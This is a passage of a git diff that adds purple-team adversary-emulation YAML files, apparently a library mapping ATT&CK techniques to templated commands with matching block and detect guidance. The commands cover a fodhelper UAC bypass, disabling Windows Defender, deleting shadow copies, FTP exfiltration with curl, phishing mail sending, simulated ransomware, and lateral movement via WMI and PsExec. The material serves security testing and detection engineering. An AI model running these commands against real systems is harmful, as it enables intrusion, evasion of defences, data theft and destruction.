+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+  id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  tid: T1014
+  tactic: TA0005
+  x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  tid: T1548.002
+  tactic: TA0004
+  x_references:
+  - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+  x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  tid: T1218.011
+  tactic: TA0005
+  x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+  id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  tid: T1562.001
+  tactic: TA0005
+  x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  tid: T1484
+  tactic: TA0003
+  x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  isv: 1
diff --git a/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
new file mode 100644
index 0000000..dbf086a
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
@@ -0,0 +1,24 @@
+name: Internal network scan using Net Scan
+description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+platforms:
+- windows
+guidance:
+- cmd> {{ netscan_binary }}
+block:
+- Network security controls block source generating a large volume of connection requests
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- ID/PS
+- Firewall
+- SIEM
+- Application Control
+metadata:
+  id: 3f120c23-78c0-462f-808f-38ef4f607233
+  tid: T1046
+  tactic: TA0007
+  x_tools:
+  - https://www.softperfect.com/products/networkscanner/
+  x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+  isv: 1
diff --git a/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
new file mode 100644
index 0000000..751b34b
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
@@ -0,0 +1,20 @@
+name: Domain trust discovery via nltest
+description: Identify domain trust relationships using nltest.exe
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /domain_trusts /all_trusts
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  tid: T1482
+  tactic: TA0007
+  x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  isv: 1
diff --git a/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: 672f8861-c914-4f58-b861-5107ce19f61c
+  tid: T1087.002
+  tactic: TA0007
+  x_tools:
+  - https://github.com/BloodHoundAD/SharpHound
+  x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+  isv: 1
diff --git a/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  tid: T1087.002
+  tactic: TA0007
+  x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  isv: 1
diff --git a/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  tid: T1018
+  tactic: TA0007
+  x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  isv: 1
diff --git a/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+  id: a7134d71-dc49-41a8-a309-ec520c96a089
+  tid: T1221
+  tactic: TA0005
+  x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+  isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml b/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
new file mode 100644
index 0000000..fff885f
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over FTP
+description: Exfiltrate data from the internal network to an external system via FTP
+platforms:
+guidance:
+- https://dlptest.com/ftp-test/
+- shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+block:
+- Outbound connections over FTP are blocked by network security configurations
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- DLP
+- Firewall
+metadata:
+  id: 11b7a86e-4596-4df9-a2a9-705096756d28
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+  isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  tid: T1567.002
+  tactic: TA0010
+  x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  tid: T1041
+  tactic: TA0010
+  x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  isv: 1
diff --git a/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  tid: T1490
+  tactic: TA0040
+  x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  isv: 1
diff --git a/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  tid: T1484.001
+  tactic: TA0005
+  x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  isv: 1
diff --git a/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+  id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  tid: T1486
+  tactic: TA0040
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+  x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml b/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
new file mode 100644
index 0000000..88fa6ed
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
@@ -0,0 +1,17 @@
+name: Attachment - Macro
+description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
new file mode 100644
index 0000000..b95efea
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
@@ -0,0 +1,16 @@
+name: Suspicious service use
+description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+controls:
+- SIEM
+metadata:
+  id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
new file mode 100644
index 0000000..7e31368
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
@@ -0,0 +1,17 @@
+name: Suspicious external employee login
+description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+platforms:
+guidance:
+block:
+- Suspicious logins originating from select geolocations are blocked
+detect:
+- Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+controls:
+- SIEM
+- IdP
+metadata:
+  id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml b/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
new file mode 100644
index 0000000..c65d238
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
@@ -0,0 +1,17 @@
+name: Link - Zipped DLL via sharing
+description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+  tid: T1566.002
+  tactic: TA0001
+  x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+  id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  tid: T1621
+  tactic: TA0006
+  x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  isv: 1
diff --git a/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  tid: T1021.001
+  tactic: TA0008
+  x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  isv: 1
diff --git a/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  tid: T1021.003
+  tactic: TA0008
+  x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  isv: 1
diff --git a/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  tid: T1021.002
+  tactic: TA0008
+  x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  isv: 1
diff --git a/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
new file mode 100644
index 0000000..c373b4f
--- /dev/null
+++ b/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
@@ -0,0 +1,20 @@
+name: Remote .exe copy
+description: Copy an .exe payload to a temp folder on the remote target
+platforms:
+guidance:
+- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
